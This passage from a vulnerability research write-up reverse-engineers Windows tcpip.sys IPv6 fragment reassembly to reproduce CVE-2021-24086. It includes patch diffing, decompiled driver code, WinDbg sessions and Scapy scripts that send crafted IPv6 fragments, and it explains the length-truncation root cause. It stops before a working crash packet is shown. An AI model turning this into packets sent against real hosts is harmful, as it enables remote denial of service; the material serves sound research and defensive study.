08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists

For anybody else in for a long ride, let's get to it :)

Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less or not covered in his post like tcpip.sys internals for example.

All right, let's start by the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

  • There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
  • Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
  • One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet we also learn that those flaws have been internally found by Microsoft's own @piazzt which is awesome.

Googling around also reveals a bunch more useful information due to the fact that it would seem that Microsoft privately shared with their partners PoCs via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-2486) as a first step. I figured it might be easier to trigger and that I might be able to use the acquired knowledge for triggering it to understand better tcpip.sys and maybe work on the other ones if time and motivation allows.

The next logical step is to diff the patches to identify the fixes.

Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches. Probably Windows XP / Windows 7 time to be honest. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

bindiff

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

bindiff

It ends with what looks like a comparison with the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet right?

Reverse-engineering tcpip.sys

This is where the real journey and the usual emotional rollercoasters when studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, I was wrong though.

Baby steps

First thing I did was to prepare a lab environment. I installed a Windows 10 (target) and a Linux VM (attacker), set-up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), created a virtual switch which the two VMs are sharing. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sights - no big surprise there; it implements Windows IPv4 & IPv6 network stack after all. I started the adventure by focusing first on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

ida

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')

This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff802`2edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
 # Call Site
00 tcpip!Ipv6pReassembleDatagram
01 tcpip!Ipv6pReceiveFragment
02 tcpip!Ipv6pReceiveFragmentList
03 tcpip!IppReceiveHeaderBatch
04 tcpip!IppFlcReceivePacketsCore
05 tcpip!IpFlcReceivePackets
06 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
07 tcpip!FlReceiveNetBufferListChainCalloutRoutine
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx
0a tcpip!FlReceiveNetBufferListChain

We can even observe the fragmented packets in Wireshark which is also pretty cool:

wireshark

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) in smaller chunks to be able to be sent across network equipment. The receiving network stack has the burden to stitch them all together in a safe manner (winkwink).

All right, perfect. We have now what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up, top-down. Loads of experiments. Commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer, that seems to be related to something that got received and we want to set that to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try though but time to switch gears.

Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from but maybe we don't need to know that much. One of the first questions you might ask yourself is how the kernel stores network data? What structures does it use?

NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
   +0x000 Next             : Ptr64 _NET_BUFFER
   +0x008 CurrentMdl       : Ptr64 _MDL
   +0x010 CurrentMdlOffset : Uint4B
   +0x018 DataLength       : Uint4B
   +0x018 stDataLength     : Uint8B
   +0x020 MdlChain         : Ptr64 _MDL
   +0x028 DataOffset       : Uint4B
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferHeader  : _NET_BUFFER_HEADER
   +0x030 ChecksumBias     : Uint2B
   +0x032 Reserved         : Uint2B
   +0x038 NdisPoolHandle   : Ptr64 Void
   +0x040 NdisReserved     : [2] Ptr64 Void
   +0x050 ProtocolReserved : [6] Ptr64 Void
   +0x080 MiniportReserved : [4] Ptr64 Void
   +0x0a0 DataPhysicalAddress : _LARGE_INTEGER
   +0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
   +0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST

It can look overwhelming but we don't need to understand every detail. What is important is that the network data are stored in a regular MDL. As MDLs, NET_BUFFER can be chained together which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For the readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory in a contiguous virtual memory region. Every MDL is actually followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map in a contiguous virtual memory region; magic.

kd> dt nt!_MDL
   +0x000 Next             : Ptr64 _MDL
   +0x008 Size             : Int2B
   +0x00a MdlFlags         : Int2B
   +0x00c AllocationProcessorNumber : Uint2B
   +0x00e Reserved         : Uint2B
   +0x010 Process          : Ptr64 _EPROCESS
   +0x018 MappedSystemVa   : Ptr64 Void
   +0x020 StartVa          : Ptr64 Void
   +0x028 ByteCount        : Uint4B
   +0x02c ByteOffset       : Uint4B

NET_BUFFER_LIST are basically a structure to keep track of a list of NET_BUFFERs as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
   +0x000 Next             : Ptr64 _NET_BUFFER_LIST
   +0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
   +0x000 Link             : _SLIST_HEADER
   +0x000 NetBufferListHeader : _NET_BUFFER_LIST_HEADER
   +0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
   +0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
   +0x020 NdisPoolHandle   : Ptr64 Void
   +0x030 NdisReserved     : [2] Ptr64 Void
   +0x040 ProtocolReserved : [4] Ptr64 Void
   +0x060 MiniportReserved : [2] Ptr64 Void
   +0x070 Scratch          : Ptr64 Void
   +0x078 SourceHandle     : Ptr64 Void
   +0x080 NblFlags         : Uint4B
   +0x084 ChildRefCount    : Int4B
   +0x088 Flags            : Uint4B
   +0x08c Status           : Int4B
   +0x08c NdisReserved2    : Uint4B
   +0x090 NetBufferListInfo : [29] Ptr64 Void

Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.

The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works? I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they can chain together. The layer N tells you what you'll find next.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed during debugging it through a bazillions of experiments. Full disclosure: I am no expert so take it with a grain of salt :)

The top level function of interest is IppReceiveHeaderBatch. The first thing it does is to invoke IppReceiveHeadersHelper on every packet that are in the list:

if ( Packet )
{
    do
    {
        Next = Packet->Next;
        Packet->Next = 0;
        IppReceiveHeadersHelper(Packet, Protocol, ...);
        Packet = Next;
    }
    while ( Next );
}

Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure and figuring out the semantics of important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions reads and updates it during parsing.

NetBufferList = Packet->NetBufferList;
HeaderSize = Protocol->HeaderSize;
FirstNetBuffer = NetBufferList->FirstNetBuffer;
CurrentMdl = FirstNetBuffer->CurrentMdl;
if ( (CurrentMdl->MdlFlags & 5) != 0 )
    Va = CurrentMdl->MappedSystemVa;
else
    Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
if ( Protocol == (Protocol_t *)Ipv4Global )
{
    // ...
}
else
{
    Packet->NextHeader = IpHdr->next_header;
    Packet->NextHeaderPosition = offsetof(ipv6_header_t, next_header);
    SrcAddrOffset = offsetof(ipv6_header_t, src);
}

The function does a lot more; it initializes several Packet_t fields but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back in IppReceiveHeaderBatch, it extracts a demuxer off the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (term used in the driver).

struct Demuxer_t
{
  void (__fastcall *Parse)(Packet_t *);
  void *f0;
  void *f1;
  void *Size;
  void *f3;
  _BYTE IsExtensionHeader;
  _BYTE gap[23];
};

struct Protocol_t
{
  // ...
  Demuxer_t Demuxers[277];
};

NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

ida43

If the demuxer is handling an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header in which case it handles the next packet.

while ( ... )
{
    NetBufferList = RcvList->NetBufferList;
    IpProto = RcvList->NextHeader;
    if ( ... )
    {
        Demuxer = (Demuxer_t *)IpUdpEspDemux;
    }
    else
    {
        Demuxer = &Protocol->Demuxers[IpProto];
    }
    if ( !Demuxer->IsExtensionHeader )
        Demuxer = 0;
    if ( Demuxer )
        Demuxer->Parse(RcvList);
    else
        RcvList = RcvList->Next;
}

Makes sense - that's kinda how we would implement parsing of IPv6 packets as well right?

ida1

It is easy to dump the demuxers and their associated NextHeader / Parse values; these might come handy later.

- nh = 0  -> Ipv6pReceiveHopByHopOptions
- nh = 43 -> Ipv6pReceiveRoutingHeader
- nh = 44 -> Ipv6pReceiveFragmentList
- nh = 60 -> Ipv6pReceiveDestinationOptions

Demuxer can expose a callback routine for parsing which I called Parse. The Parse method receives a Packet and it is free to update its state; for example to grab the NextHeader that is needed to know how to parse the next layer. This is what Ipv6pReceiveFragmentList looks like (Ipv6FragmentDemux.Parse):

ida1

It makes sure the next header is IPPROTO_FRAGMENT before going further. Again, makes sense.

The mechanics of IPv6 fragmentation

Now that we understand the overall flow a bit more, it is a good time to start thinking about fragmentation. We know we need to send fragmented packets to hit the code that was fixed by the update, which we know is important somehow. The function that parses fragments is Ipv6pReceiveFragment and it is hairy. Again, keeping track of fragments probably warrants that, so nothing unexpected here.

It's also the right time for us to read literature about how exactly IPv6 fragmentation works. Concepts have been useful until now, but at this point we need to understand the nitty-gritty details. I don't want to spend too much time on this as there is tons of content online discussing the subject so I'll just give you the fast version. To define a fragment, you need to add a fragmentation header which is called IPv6ExtHdrFragment in Scapy land:

class IPv6ExtHdrFragment(_IPv6ExtHdr):
    name = "IPv6 Extension Header - Fragmentation header"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   BitField("res1", 0, 8),
                   BitField("offset", 0, 13),
                   BitField("res2", 0, 2),
                   BitField("m", 0, 1),
                   IntField("id", None)]
    overload_fields = {IPv6: {"nh": 44}}

The most important fields for us are :

  • offset which tells the start offset of where the data that follows this header should be placed in the reassembled packet
  • the m bit that specifies whether or not this is the latest fragment.

Note that the offset field is an amount of 8 bytes blocks; if you set it to 1, it means that your data will be at +8 bytes. If you set it to 2, they'll be at +16 bytes, etc.

Here is a small ghetto IPv6 fragmentation function I wrote to ensure I was understanding things properly. I enjoy learning through practice. (Scapy has fragment6):

def frag6(target, frag_id, bytes, nh, frag_size = 1008):
    '''Ghetto fragmentation.'''
    assert (frag_size % 8) == 0
    leftover = bytes
    offset = 0
    frags = []
    while len(leftover) > 0:
        chunk = leftover[: frag_size]
        leftover = leftover[len(chunk): ]
        last_pkt = len(leftover) == 0
        # 0 -> No more / 1 -> More
        m = 0 if last_pkt else 1
        assert offset < 8191
        pkt = Ether() \
            / IPv6(dst = target) \
            / IPv6ExtHdrFragment(m = m, nh = nh, id = frag_id, offset = offset) \
            / chunk

        offset += (len(chunk) // 8)
        frags.append(pkt)
    return frags

Easy enough. The other important aspect of fragmentation in the literature is related to IPv6 headers and what is called the unfragmentable part of a packet. Here is how Microsoft describes the unfragmentable part: "This part consists of the IPv6 header, the Hop-by-Hop Options header, the Destination Options header for intermediate destinations, and the Routing header". It also is the part that precedes the fragmentation header. Obviously, if there is an unfragmentable part, there is a fragmentable part. Easy, the fragmentable part is what you are sending behind the fragmentation header. The reassembly process is the process of stitching together the unfragmentable part with the reassembled fragmentable part into one beautiful reassembled packet. Here is a diagram taken from Understanding the IPv6 Header that sums it up pretty well:

msftpress

All of this theoretical information is very useful because we can now look for those details while we reverse-engineer. It is always easier to read code and try to match it against what it is supposed or expected to do.

Theory vs practice: Ipv6pReceiveFragment

At this point, I felt I had accumulated enough new information and it was time for zooming back in into the target. We want to verify that reality works like the literature says it does and by doing we will improve our overall understanding. After studying this code for a while we start to understand the big lines. The function receives a Packet but as this structure is packet specific it is not enough to track the state required to reassemble a packet. This is why another important structure is used for that; I called it Reassembly.

The overall flow is basically broken up in three main parts; again no need for us to understand every single details, let's just understand it conceptually and what/how it tries to achieve its goals:

  • 1 - Figure out if the received fragment is part of an already existing Reassembly. According to the literature, we know that network stacks should use the source address, the destination address as well as the fragmentation header's identifier to determine if the current packet is part of a group of fragments. In practice, the function IppReassemblyHashKey hashes those fields together and the resulting hash is used to index into a hash-table that stores Reassembly structures (Ipv6pFragmentLookup):
int IppReassemblyHashKey(__int64 Iface, int Identification, __int64 Pkt)
{
  //...
  Protocol = *(_QWORD *)(Iface + 40);
  OffsetSrcIp = 12i64;
  AddressLength = *(unsigned __int16 *)(*(_QWORD *)(Protocol + 16) + 6i64);
  if ( Protocol != Ipv4Global )
    OffsetSrcIp = offsetof(ipv6_header_t, src);
  H = RtlCompute37Hash(
        g_37HashSeed,
        Pkt + OffsetSrcIp,
        AddressLength);
  OffsetDstIp = 16i64;
  if ( Protocol != Ipv4Global )
    OffsetDstIp = offsetof(ipv6_header_t, dst);
  H2 = RtlCompute37Hash(H, Pkt + OffsetDstIp, AddressLength);
  return RtlCompute37Hash(H2, &Identification, 4i64) | 0x80000000;
}

Reassembly_t* Ipv6pFragmentLookup(__int64 Iface, int Identification, ipv6_header_t *Pkt, KIRQL *OldIrql)
{
  // ...
  v5 = *(_QWORD *)Iface;
  Context.Signature = 0;
  HashKey = IppReassemblyHashKey(v5, Identification, (__int64)Pkt);
  *OldIrql = KeAcquireSpinLockRaiseToDpc(&Ipp6ReassemblyHashTableLock);
  *(_OWORD *)&Context.ChainHead = 0;
  for ( CurrentReassembly = (Reassembly_t *)RtlLookupEntryHashTable(&Ipp6ReassemblyHashTable, HashKey, &Context);
        ;
        CurrentReassembly = (Reassembly_t *)RtlGetNextEntryHashTable(&Ipp6ReassemblyHashTable, &Context) )
  {
    // If we have walked through all the entries in the hash-table,
    // then we can just bail.
    if ( !CurrentReassembly )
      return 0;
    // If the current entry matches our iface, pkt id, ip src/dst
    // then we found a match!
    if ( CurrentReassembly->Iface == Iface
      && CurrentReassembly->Identification == Identification
      && memcmp(&CurrentReassembly->Ipv6.src.u.Byte[0], &Pkt->src.u.Byte[0], 16) == 0
      && memcmp(&CurrentReassembly->Ipv6.dst.u.Byte[0], &Pkt->dst.u.Byte[0], 16) == 0 )
    {
      break;
    }
  }
  // ...
  return CurrentReassembly;
}
  • 1.1 - If the fragment doesn't belong to any known group, it needs to be put in a newly created Reassembly. This is what IppCreateInReassemblySet does. It's worth noting that this is a point of interest for a reverse-engineer because this is where the Reassembly object gets allocated and constructed (in IppCreateReassembly). It means we can retrieve its size as well as some more information about some of the fields.
Reassembly_t *IppCreateInReassemblySet(
    PKSPIN_LOCK SpinLock, void *Src, __int64 Iface, __int64 Identification, KIRQL NewIrql
)
{
  Reassembly_t *Reassembly = IppCreateReassembly(Src, Iface, Identification);
  if ( Reassembly )
  {
    IppInsertReassembly((__int64)SpinLock, Reassembly);
    KeAcquireSpinLockAtDpcLevel(&Reassembly->Lock);
    KeReleaseSpinLockFromDpcLevel(SpinLock);
  }
  else
  {
    KeReleaseSpinLock(SpinLock, NewIrql);
  }
  return Reassembly;
}

ida3
  • 2 - Now that we have a Reassembly structure, the main function wants to figure out where the current fragment fits in the overall reassembled packet. The Reassembly keeps track of fragments using various lists. It uses a ContiguousList that chains fragments that will be contiguous in the reassembled packet. IppReassemblyFindLocation is the function that seems to implement the logic to figure out where the current fragment fits.

  • 2.1 - If IppReassemblyFindLocation returns a pointer to the start of the ContiguousList, it means that the current packet is the first fragment. This is where the function extracts and keeps track of the unfragmentable part of the packet. It is kept in a pool buffer that is referenced in the Reassembly structure.

if ( ReassemblyLocation == &Reassembly->ContiguousStartList )
{
  Reassembly->NextHeader = Fragment->nexthdr;
  UnfragmentableLength = LOWORD(Packet->NetworkLayerHeaderSize) - 48;
  Reassembly->UnfragmentableLength = UnfragmentableLength;
  if ( UnfragmentableLength )
  {
    UnfragmentableData = ExAllocatePoolWithTagPriority(
      (POOL_TYPE)512,
      UnfragmentableLength,
      'erPI',
      LowPoolPriority
    );
    Reassembly->UnfragmentableData = UnfragmentableData;
    if ( !UnfragmentableData )
    {
      // ...
      goto Bail_0;
    }
    // ...
    // Copy the unfragmentable part of the packet inside the pool
    // buffer that we have allocated.
    RtlCopyMdlToBuffer(
      FirstNetBuffer->MdlChain,
      FirstNetBuffer->DataOffset - Packet->NetworkLayerHeaderSize + 0x28,
      Reassembly->UnfragmentableData,
      Reassembly->UnfragmentableLength,
      v51);
    NextHeaderOffset = Packet->NextHeaderPosition;
  }
  Reassembly->NextHeaderOffset = NextHeaderOffset;
  *(_QWORD *)&Reassembly->Ipv6 = *(_QWORD *)Packet->Ipv6Hdr;
}
  • 3 - The fragment is then added into the Reassembly as part of a group of fragments by IppReassemblyInsertFragment. On top of that, if we have received every fragment necessary to start a reassembly, the function Ipv6pReassembleDatagram is invoked. Remember this guy? This is the function that has been patched and that we hit earlier in the post. But this time, we understand how we got there.

At this stage we have an OK understanding of the data structures involved to keep track of groups of fragments and how/when reassembly gets kicked off. We've also commented and refined various structure fields that we lifted early in the process; this is very helpful because now we can understand the fix for the vulnerability:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  //...
  UnfragmentableLength = Reassembly->UnfragmentableLength;
  TotalLength = UnfragmentableLength + Reassembly->DataLength;
  HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // Below is the added code by the patch
  if ( TotalLength > 0xFFF ) {
      // Bail
  }

How cool is that? That's really rewarding. Putting in a bunch of work that may feel not that useful at the time, but eventually adds up, snow-balls and really moves the needle forward. It's just a slow process and you gotta get used to it; that's just how the sausage is made.

Let's not get ahead of ourselves though, the emotional rollercoaster is right around the corner :)

Hiding in plain sight

All right - at this point I think we are done with zooming out and understanding the big picture. We understand the beast well enough to start getting back on this BSoD. After reading Ipv6pReassembleDatagram a few times I honestly couldn't figure out where the advertised crash could happen. Pretty frustrating. That is why I decided instead to use the debugger to modify Reassembly->DataLength and UnfragmentableLength at runtime to see if this could give me any hints. The first one didn't seem to do anything, but the second one bug-checked the machine with a NULL dereference, bingo that is looking good!

After carefully analyzing the crash I've started to realize that the potential issue has been hiding in plain sight in front of my eyes; here is the code:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0i64,
                                        0i64,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

NetioAllocateAndReferenceNetBufferAndNetBufferList allocates a brand new NBL called NetBufferList. Then NetioRetreatNetBuffer is called:

NDIS_STATUS NetioRetreatNetBuffer(_NET_BUFFER *Nb, ULONG Amount, ULONG DataBackFill)
{
  const uint32_t CurrentMdlOffset = Nb->CurrentMdlOffset;
  if ( CurrentMdlOffset < Amount )
    return NdisRetreatNetBufferDataStart(Nb, Amount, DataBackFill, NetioAllocateMdl);
  Nb->DataOffset -= Amount;
  Nb->DataLength += Amount;
  Nb->CurrentMdlOffset = CurrentMdlOffset - Amount;
  return 0;
}

Because the FirstNetBuffer just got allocated, it is empty and most of its fields are zero. This means that NetioRetreatNetBuffer triggers a call to NdisRetreatNetBufferDataStart which is publicly documented. According to the documentation, it should allocate an MDL using NetioAllocateMdl as the network buffer is empty as we mentioned above. One thing to notice is that the amount of bytes, HeaderAndOptionsLength, passed to NetioRetreatNetBuffer is truncated to a uint16_t; odd.

  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )

Now that there is backing space in the NB for the IPv6 header as well as the unfragmentable part of the packet, it needs to get a pointer to the backing data in order to populate the buffer. NdisGetDataBuffer is documented as to gain access to a contiguous block of data from a NET_BUFFER structure. After reading the documentation several time, it was a little bit confusing to me so I figured I'd throw NDIS in IDA and have a look at the implementation:

PVOID NdisGetDataBuffer(PNET_BUFFER NetBuffer, ULONG BytesNeeded, PVOID Storage, UINT AlignMultiple, UINT AlignOffset)
{
  const _MDL *CurrentMdl = NetBuffer->CurrentMdl;
  if ( !BytesNeeded || !CurrentMdl || NetBuffer->DataLength < BytesNeeded )
    return 0i64;
// ...

Just looking at the beginning of the implementation something stands out. As NdisGetDataBuffer is called with HeaderAndOptionsLength (not truncated), we should be able to hit the following condition NetBuffer->DataLength < BytesNeeded when HeaderAndOptionsLength is larger than 0xffff. Why, you ask? Let's take an example. HeaderAndOptionsLength is 0x1337, so NetioRetreatNetBuffer allocates a backing buffer of 0x1337 bytes, and NdisGetDataBuffer returns a pointer to the newly allocated data; works as expected. Now let's imagine that HeaderAndOptionsLength is 0x31337. This means that NetioRetreatNetBuffer allocates 0x1337 (because of the truncation) bytes but calls NdisGetDataBuffer with 0x31337 which makes the call fail because the network buffer is not big enough and we hit this condition NetBuffer->DataLength < BytesNeeded.

As the returned pointer is trusted not to be NULL, Ipv6pReassembleDatagram carries on by using it for a memory write:

  *Buffer = Reassembly->Ipv6;

This is where it should bugcheck. As usual we can verify our understanding of the function with a WinDbg session. Here is a simple Python script that sends two fragments:

from scapy.all import *
id = 0xdeadbeef
first = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 1, offset = 0) \
    / UDP(sport = 0x1122, dport = 0x3344) \
    / '---frag1'
second = Ether() \
    / IPv6(dst = 'ff02::1') \
    / IPv6ExtHdrFragment(id = id, m = 0, offset = 2) \
    / '---frag2'
sendp([first, second], iface='eth1')

Let's see what the reassembly looks like when those packets are received:

kd> bp tcpip!Ipv6pReassembleDatagram

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff800`117cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> p
tcpip!Ipv6pReassembleDatagram+0x5:
fffff800`117cdd71 48894c2408      mov     qword ptr [rsp+8],rcx

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0x9c:
fffff800`117cde08 48ff1569660700  call    qword ptr [tcpip!_imp_NetioAllocateAndReferenceNetBufferAndNetBufferList (fffff800`11844478)]

kd> 
tcpip!Ipv6pReassembleDatagram+0xa3:
fffff800`117cde0f 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=ffffc107f7be1d90 <- this is the allocated NBL

kd> !ndiskd.nbl @rax
    NBL                ffffc107f7be1d90    Next NBL           NULL
    First NB           ffffc107f7be1f10    Source             NULL
                                           Pool               ffffc107f58ba980 - NETIO
    Flags              NBL_ALLOCATED

    Walk the NBL chain                     Dump data payload
    Show out-of-band information           Display as Wireshark hex dump


; The first NB is empty; its length is 0 as expected

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0                   Source pool        ffffc107f58ba980
    First MDL          0                   DataOffset         0
    Current MDL        [NULL]              Current MDL offset 0

    View associated NBL

// ...

kd> r @rcx, @rdx
rcx=ffffc107f7be1f10 rdx=0000000000000028 <- the first NB and the size to allocate for it

kd>
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff800`117cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff800`11691354)

kd> p
tcpip!Ipv6pReassembleDatagram+0xde:
fffff800`117cde4a 85c0            test    eax,eax

; The first NB now has 0x28 bytes backing MDL

kd> !ndiskd.nb ffffc107f7be1f10
    NB                 ffffc107f7be1f10    Next NB            NULL
    Length             0n40                Source pool        ffffc107f58ba980
    First MDL          ffffc107f5ee8040    DataOffset         0n56
    Current MDL        [First MDL]         Current MDL offset 0n56

    View associated NBL

// ...

; Getting access to the backing buffer

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff800`117cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff800`11844178)]

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff800`117cde71 0f1f440000      nop     dword ptr [rax+rax]

; This is the backing buffer; it has leftover data, but gets initialized later

kd> db @rax
ffffc107`f5ee80b0  05 02 00 00 01 00 8f 00-41 dc 00 00 00 01 04 00  ........A.......

All right, so it sounds like we have a plan - let's get to work.

Manufacturing a packet of the death: chasing phantoms

Well... sending a packet with a large header should be trivial right? That's initially what I thought. After trying various things to achieve this goal, I quickly realized it wouldn't be that easy. The main issue is the MTU. Basically, network devices don't allow you to send packets bigger than like ~1200 bytes. Online content suggests that some ethernet cards and network switches allow you to bump this limit. Because I was running my test in my own Hyper-V lab, I figured it was fair enough to try to reproduce the NULL dereference with non-default parameters, so I looked for a way to increase the MTU on the virtual switch to 64k.

The issue with that is that Hyper-V didn't allow me to do that. The only parameter I found allowed me to bump the limit to about 9k which is very far from the 64k I needed to trigger this issue. At this point, I felt frustrated because I felt I was so close to the end, but no cigar. Even though I had read that this vulnerability could be thrown over the internet, I kept going in this wrong direction. If it could be thrown from the internet, it meant it had to go through regular network equipment and there was no way a 64k packet would work. But I ignored this hard truth for a bit of time.

